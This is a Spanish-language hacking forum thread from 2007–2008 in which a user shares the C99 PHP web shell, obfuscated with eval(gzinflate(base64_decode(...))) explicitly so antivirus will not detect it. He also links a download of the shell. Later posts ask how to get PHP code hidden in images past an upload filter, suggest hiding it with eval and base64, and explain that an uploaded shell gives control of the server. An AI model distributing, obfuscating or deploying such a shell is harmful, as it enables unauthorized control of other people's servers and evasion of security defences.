|
Título: C99 Shell.php cifrado en base 64 Publicado por: WHK en 21 Junio 2007, 09:17 am Conseguí una verción del C99 shell cifrado en su totalidad para no ser descubierto por los antivirus.
Como dice un amigo: Enjoy! Citar <? eval(gzinflate(base64_decode(' 7b3peuJI0jD6+53nmXtQqT3ddhsjwHgrV7mH1cZm [...] Título: Re: C99 Shell.php cifrado en base 64 Publicado por: WHK en 21 Junio 2007, 09:33 am excede el limite y no se ve el código completo >:( lo subo y lo cuelgo... one moment...
------>Post modificado Listo: http://rapidshare.com/files/38464292/aAkjd5D-WHK.rar Título: Re: C99 Shell.php cifrado en base 64 Publicado por: laideker en 22 Junio 2007, 05:04 am Esta bueno... ;D ;D ;D
Título: Re: C99 Shell.php cifrado en base 64 Publicado por: yeikos en 22 Junio 2007, 12:08 pm Mi PHP-Shell... ;D
Código: <?php Título: Re: C99 Shell.php cifrado en base 64 Publicado por: дٳŦ٭ en 22 Junio 2007, 12:41 pm jeje, muy bueno. Una duda ¿la codificación es para burlar los A/V clientes o del server? no entiendo :xD
Otra, por ejemplo, tengo un server que opera con algún "mod" que cuando intentas subir una "imagen" (con código PHP, véase el tuto de codebreak) me tira error y una advertencia :xD ¿habrá alguna forma de saltarlo? Saludos Título: Re: C99 Shell.php cifrado en base 64 Publicado por: yeikos en 22 Junio 2007, 12:46 pm Si dices el mensaje quizás podamos ayudarte...
Título: Re: C99 Shell.php cifrado en base 64 Publicado por: Azielito en 22 Junio 2007, 20:10 pm Tal vez sea el de LFI???
el de los comentarios en el JPEG? ñ_ñ Pos, podrias hacer lo mismo que hicieron con esta shell, usar la funcion eval()... (claro, tambien con base64_decode() ) ^^ Título: Re: C99 Shell.php cifrado en base 64 Publicado por: дٳŦ٭ en 23 Junio 2007, 07:00 am El mensaje es simple "Se ha detectado código PHP en su imagen, no se ha podido subir y se ha reportado su ip xxx.xxx.xxx.xxx".
No Aziel, de hecho ya iba cifrado el código con Zend, ni idea como saltar ese filtro. Saludos Título: Re: C99 Shell.php cifrado en base 64 Publicado por: fitu en 23 Junio 2007, 07:11 am disculpen mi ignoracia, pero la verdad no entiendo de q se trata :-[
baje el .rar y no comprendo para q sirve Título: Re: C99 Shell.php cifrado en base 64 Publicado por: Deka_10 en 23 Junio 2007, 20:46 pm disculpen mi ignoracia, pero la verdad no entiendo de q se trata :-[ baje el .rar y no comprendo para q sirve entonces para que lo bajas? Título: Re: C99 Shell.php cifrado en base 64 Publicado por: fitu en 24 Junio 2007, 06:49 am ... no comprendia bien de q estaban hablando, pero por no ser comodo, baje el rar para ver si le encontraba la vuelta sin molestarlos...
al ver q no lograba entender tampoco el .rar no queria quedarme con la duda y solo por curiosidad pregunte... si te parece q esta mal disculpame, pero mi intension solo era entender de q estaban hablando... saludos Título: Re: C99 Shell.php cifrado en base 64 Publicado por: WHK en 24 Junio 2007, 09:29 am Es un software compilado en PHP.. la gracia es que puedes ejecutar cosas mirandola desde una pagina web.
si logras subir ese C99 en algún servidor puedes controlarlo en algunos casos con tan solo visitarlo. Si quieres ver como funciona hazte una cuenta en iespana y subelo y despues mira como se ve y para que funciona. Manuales hay por montones a estas alturas... yo iba a hacer uno pero nunca tube tiempo de terminarla ya que no tan solo deve incluir el como usarla, sino el como subirla, que hacer despues, etc etc... entiendes un poco mejor? Título: Re: C99 Shell.php cifrado en base 64 Publicado por: fitu en 24 Junio 2007, 18:36 pm Si, gracias ahora si entiendo de q se trata :D
ahora me voy a crear una cuenta en iespana y pruebo... gracias por contestar man Título: Re: C99 Shell.php cifrado en base 64 Publicado por: Deka_10 en 25 Junio 2007, 00:39 am ... no comprendia bien de q estaban hablando, pero por no ser comodo, baje el rar para ver si le encontraba la vuelta sin molestarlos... al ver q no lograba entender tampoco el .rar no queria quedarme con la duda y solo por curiosidad pregunte... si te parece q esta mal disculpame, pero mi intension solo era entender de q estaban hablando... saludos okok, es que muchas veces hay skiddies por aqui que solo quieren descargar hacer 2 clicks y creerse dioses del hacking, por eso te lo preguntaba. Título: Re: C99 Shell.php cifrado en base 64 Publicado por: termithe en 13 Agosto 2007, 00:29 am ... no comprendia bien de q estaban hablando, pero por no ser comodo, baje el rar para ver si le encontraba la vuelta sin molestarlos... al ver q no lograba entender tampoco el .rar no queria quedarme con la duda y solo por curiosidad pregunte... si te parece q esta mal disculpame, pero mi intension solo era entender de q estaban hablando... saludos okok, es que muchas veces hay skiddies por aqui que solo quieren descargar hacer 2 clicks y creerse dioses del hacking, por eso te lo preguntaba. Si o sea como tú.. Título: Re: C99 Shell.php cifrado en base 64 Publicado por: ek_col en 2 Febrero 2008, 00:51 am Es interezante ver como muchos nacieron aprendidos...........
Asi como a nadie le importa que hay gente que llega y quiere aprender, que no entiende y no hay algun ser gentil que tenga la bondad de dar una guia sino mas bien hace uso de su ego para demostar su aparente superioridad, olvidando que alguna vez fue un principiante y que a duras penas sabia navegar en internet. Ahi les dejo para que lo piensen....... El cielo esta aun muy lejano para ser tocado. Título: Re: C99 Shell.php cifrado en base 64 Publicado por: dark_hat en 11 Febrero 2008, 21:47 pm El mensaje es simple "Se ha detectado código PHP en su imagen, no se ha podido subir y se ha reportado su ip xxx.xxx.xxx.xxx". No Aziel, de hecho ya iba cifrado el código con Zend, ni idea como saltar ese filtro. Saludos Tal vez la web detecte los caracteres "<?" y "?>", xq no dices q web es para q podamos ayudarte? |